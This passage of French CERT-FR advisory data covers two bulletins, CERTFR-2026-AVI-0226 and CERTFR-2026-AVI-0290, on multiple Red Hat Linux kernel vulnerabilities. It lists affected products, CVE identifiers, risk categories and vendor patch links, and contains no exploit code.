"description": "Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 9.2 ppc64le",
"product": {
"name": "Red Hat Enterprise Linux Server",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 8.6 x86_64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 - 4 years of updates 10.0 aarch64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 - Extended Update Support 10.0 aarch64",
"product": {
"name": "Red Hat Enterprise Linux",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-40064",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40064"
},
{
"name": "CVE-2023-53821",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53821"
},
{
"name": "CVE-2025-68349",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68349"
},
{
"name": "CVE-2023-53833",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53833"
},
{
"name": "CVE-2025-37882",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37882"
},
{
"name": "CVE-2025-39933",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39933"
},
{
"name": "CVE-2025-38022",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38022"
},
{
"name": "CVE-2025-40322",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40322"
},
{
"name": "CVE-2025-38459",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38459"
},
{
"name": "CVE-2025-40271",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40271"
},
{
"name": "CVE-2022-50673",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50673"
},
{
"name": "CVE-2025-40269",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40269"
},
{
"name": "CVE-2025-37861",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37861"
},
{
"name": "CVE-2023-53673",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53673"
},
{
"name": "CVE-2026-23074",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23074"
},
{
"name": "CVE-2023-53539",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53539"
},
{
"name": "CVE-2025-38206",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38206"
},
{
"name": "CVE-2025-38129",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38129"
},
{
"name": "CVE-2025-40168",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40168"
},
{
"name": "CVE-2025-39760",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39760"
},
{
"name": "CVE-2023-53762",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53762"
},
{
"name": "CVE-2025-38415",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38415"
},
{
"name": "CVE-2022-50865",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50865"
},
{
"name": "CVE-2025-38106",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38106"
},
{
"name": "CVE-2023-53827",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53827"
},
{
"name": "CVE-2025-38730",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38730"
},
{
"name": "CVE-2023-53581",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53581"
},
{
"name": "CVE-2023-53513",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53513"
},
{
"name": "CVE-2025-40304",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40304"
},
{
"name": "CVE-2025-40096",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40096"
},
{
"name": "CVE-2025-68800",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68800"
},
{
"name": "CVE-2023-53192",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53192"
},
{
"name": "CVE-2025-38248",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38248"
}
],
"initial_release_date": "2026-02-27T00:00:00",
"last_revision_date": "2026-02-27T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0226",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-02-27T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans le noyau Linux de Red Hat. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer un d\u00e9ni de service \u00e0 distance, une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es et une atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans le noyau Linux de Red Hat",
"vendor_advisories": [
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:3275",
"url": "https://access.redhat.com/errata/RHSA-2026:3275"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:3360",
"url": "https://access.redhat.com/errata/RHSA-2026:3360"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:3267",
"url": "https://access.redhat.com/errata/RHSA-2026:3267"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:3375",
"url": "https://access.redhat.com/errata/RHSA-2026:3375"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:3358",
"url": "https://access.redhat.com/errata/RHSA-2026:3358"
},
{
"published_at": "2026-02-23",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:3110",
"url": "https://access.redhat.com/errata/RHSA-2026:3110"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:3293",
"url": "https://access.redhat.com/errata/RHSA-2026:3293"
},
{
"published_at": "2026-02-23",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:3124",
"url": "https://access.redhat.com/errata/RHSA-2026:3124"
},
{
"published_at": "2026-02-23",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:3088",
"url": "https://access.redhat.com/errata/RHSA-2026:3088"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:3268",
"url": "https://access.redhat.com/errata/RHSA-2026:3268"
},
{
"published_at": "2026-02-23",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:3083",
"url": "https://access.redhat.com/errata/RHSA-2026:3083"
},
{
"published_at": "2026-02-26",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:3388",
"url": "https://access.redhat.com/errata/RHSA-2026:3388"
},
{
"published_at": "2026-02-25",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:3277",
"url": "https://access.redhat.com/errata/RHSA-2026:3277"
},
{
"published_at": "2026-02-23",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:3066",
"url": "https://access.redhat.com/errata/RHSA-2026:3066"
}
]
}
CERTFR-2026-AVI-0290
Vulnerability from certfr_avis - Published: 2026-03-13 - Updated: 2026-03-13
De multiples vulnérabilités ont été découvertes dans le noyau Linux de Red Hat. Elles permettent à un attaquant de provoquer une atteinte à l'intégrité des données, un contournement de la politique de sécurité et un problème de sécurité non spécifié par l'éditeur.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
| Vendor | Product | Description | ||
|---|---|---|---|---|
| Red Hat | N/A | Red Hat Enterprise Linux for Power, little endian - Extended Update Support 9.6 ppc64le | ||
| Red Hat | N/A | Red Hat Enterprise Linux for x86_64 9 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for Power, little endian 9 ppc64le | ||
| Red Hat | N/A | Red Hat Enterprise Linux for x86_64 - Extended Update Support Extension 8.8 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for Power, little endian - Extended Update Support 9.4 ppc64le | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for x86_64 - Extended Update Support 10.0 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 9.4 ppc64le | ||
| Red Hat | N/A | Red Hat Enterprise Linux for x86_64 - Extended Update Support 9.4 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for Power, little endian - Extended Update Support 10.0 ppc64le | ||
| Red Hat | N/A | Red Hat Enterprise Linux for x86_64 - 4 years of updates 10.0 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux Server - AUS 9.6 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for Power, little endian - 4 years of support 10.0 ppc64le | ||
| Red Hat | N/A | Red Hat Enterprise Linux for x86_64 - Extended Update Support 9.6 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux Server - AUS 8.6 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for IBM z Systems - 4 years of updates 10.0 s390x | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for ARM 64 - Extended Update Support 9.4 aarch64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 9.4 x86_64 | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for ARM 64 - Extended Update Support 9.6 aarch64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for ARM 64 - Extended Update Support 10.0 aarch64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for Power, little endian 8 ppc64le | ||
| Red Hat | N/A | Red Hat Enterprise Linux for IBM z Systems 8 s390x | ||
| Red Hat | N/A | Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 9.6 ppc64le | ||
| Red Hat | N/A | Red Hat Enterprise Linux Server - TUS 8.6 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for IBM z Systems - 4 years of updates 9.4 s390x | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for x86_64 - Extended Update Support 9.4 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 9.6 s390x | ||
| Red Hat | N/A | Red Hat Enterprise Linux for ARM 64 - Extended Update Support 9.4 aarch64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux Server - TUS 8.8 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for IBM z Systems - 4 years of updates 9.0 s390x | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for x86_64 - Extended Update Support 9.6 x86_64 | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for IBM z Systems - Extended Update Support 10.0 s390x | ||
| Red Hat | N/A | Red Hat Enterprise Linux Server - AUS 9.4 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 8.6 x86_64 | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for ARM 64 8 aarch64 | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for x86_64 8 x86_64 | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for Power, little endian - Extended Update Support 10.0 ppc64le | ||
| Red Hat | N/A | Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 9.4 s390x | ||
| Red Hat | N/A | Red Hat Enterprise Linux for ARM 64 9 aarch64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for ARM 64 - Extended Update Support 9.6 aarch64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.6 ppc64le | ||
| Red Hat | N/A | Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 8.8 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for Real Time for NFV 8 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for IBM z Systems - 4 years of updates 9.6 s390x | ||
| Red Hat | N/A | Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 9.0 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for ARM 64 8 aarch64 | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for Power, little endian - Extended Update Support 9.6 ppc64le | ||
| Red Hat | N/A | Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 9.0 ppc64le | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for Power, little endian - Extended Update Support 9.4 ppc64le | ||
| Red Hat | N/A | Red Hat Enterprise Linux for ARM 64 - 4 years of updates 9.0 aarch64 | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for Power, little endian 9 ppc64le | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for IBM z Systems - Extended Update Support 9.4 s390x | ||
| Red Hat | N/A | Red Hat Enterprise Linux for ARM 64 - 4 years of updates 9.6 aarch64 | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for IBM z Systems - Extended Update Support 9.6 s390x | ||
| Red Hat | N/A | Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 10.0 s390x | ||
| Red Hat | N/A | Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.8 ppc64le | ||
| Red Hat | N/A | Red Hat Enterprise Linux for IBM z Systems 9 s390x | ||
| Red Hat | N/A | Red Hat Enterprise Linux for ARM 64 - 4 years of updates 10.0 aarch64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux Server - AUS 8.2 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for x86_64 8 x86_64 | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for x86_64 9 x86_64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for Real Time 8 x86_64 | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for Power, little endian 8 ppc64le | ||
| Red Hat | N/A | Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 9.6 x86_64 | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for ARM 64 - Extended Update Support 10.0 aarch64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for x86_64 - Extended Update Support Extension 8.6 x86_64 | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for ARM 64 9 aarch64 | ||
| Red Hat | N/A | Red Hat CodeReady Linux Builder for IBM z Systems 9 s390x | ||
| Red Hat | N/A | Red Hat Enterprise Linux for ARM 64 - 4 years of updates 9.4 aarch64 | ||
| Red Hat | N/A | Red Hat Enterprise Linux for x86_64 - Extended Update Support 10.0 x86_64 |
| Title | Publication Time | Tags | |||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Red Hat Enterprise Linux for Power, little endian - Extended Update Support 9.6 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 9 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Power, little endian 9 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Extended Update Support Extension 8.8 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Power, little endian - Extended Update Support 9.4 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for x86_64 - Extended Update Support 10.0 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 9.4 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Extended Update Support 9.4 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Power, little endian - Extended Update Support 10.0 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - 4 years of updates 10.0 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - AUS 9.6 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Power, little endian - 4 years of support 10.0 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Extended Update Support 9.6 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - AUS 8.6 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems - 4 years of updates 10.0 s390x",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for ARM 64 - Extended Update Support 9.4 aarch64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 9.4 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for ARM 64 - Extended Update Support 9.6 aarch64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 - Extended Update Support 10.0 aarch64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Power, little endian 8 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems 8 s390x",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 9.6 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - TUS 8.6 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems - 4 years of updates 9.4 s390x",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for x86_64 - Extended Update Support 9.4 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 9.6 s390x",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 - Extended Update Support 9.4 aarch64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - TUS 8.8 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems - 4 years of updates 9.0 s390x",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for x86_64 - Extended Update Support 9.6 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for IBM z Systems - Extended Update Support 10.0 s390x",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - AUS 9.4 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 8.6 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for ARM 64 8 aarch64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for x86_64 8 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for Power, little endian - Extended Update Support 10.0 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 9.4 s390x",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 9 aarch64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 - Extended Update Support 9.6 aarch64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.6 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 8.8 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Real Time for NFV 8 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems - 4 years of updates 9.6 s390x",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 9.0 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 8 aarch64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for Power, little endian - Extended Update Support 9.6 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 9.0 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for Power, little endian - Extended Update Support 9.4 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 - 4 years of updates 9.0 aarch64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for Power, little endian 9 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for IBM z Systems - Extended Update Support 9.4 s390x",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 - 4 years of updates 9.6 aarch64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for IBM z Systems - Extended Update Support 9.6 s390x",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 10.0 s390x",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.8 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for IBM z Systems 9 s390x",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 - 4 years of updates 10.0 aarch64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux Server - AUS 8.2 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 8 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for x86_64 9 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for Real Time 8 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for Power, little endian 8 ppc64le",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Update Services for SAP Solutions 9.6 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for ARM 64 - Extended Update Support 10.0 aarch64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Extended Update Support Extension 8.6 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for ARM 64 9 aarch64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat CodeReady Linux Builder for IBM z Systems 9 s390x",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for ARM 64 - 4 years of updates 9.4 aarch64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
},
{
"description": "Red Hat Enterprise Linux for x86_64 - Extended Update Support 10.0 x86_64",
"product": {
"name": "N/A",
"vendor": {
"name": "Red Hat",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-40064",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40064"
},
{
"name": "CVE-2024-47727",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47727"
},
{
"name": "CVE-2025-38141",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38141"
},
{
"name": "CVE-2025-71085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71085"
},
{
"name": "CVE-2025-37882",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37882"
},
{
"name": "CVE-2025-38024",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38024"
},
{
"name": "CVE-2025-40269",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40269"
},
{
"name": "CVE-2025-22056",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22056"
},
{
"name": "CVE-2025-38206",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38206"
},
{
"name": "CVE-2025-38129",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38129"
},
{
"name": "CVE-2026-23001",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23001"
},
{
"name": "CVE-2025-40168",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40168"
},
{
"name": "CVE-2025-38289",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38289"
},
{
"name": "CVE-2024-56603",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56603"
},
{
"name": "CVE-2025-38703",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38703"
},
{
"name": "CVE-2025-38106",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38106"
},
{
"name": "CVE-2025-38349",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38349"
}
],
"initial_release_date": "2026-03-13T00:00:00",
"last_revision_date": "2026-03-13T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0290",
"revisions": [
{
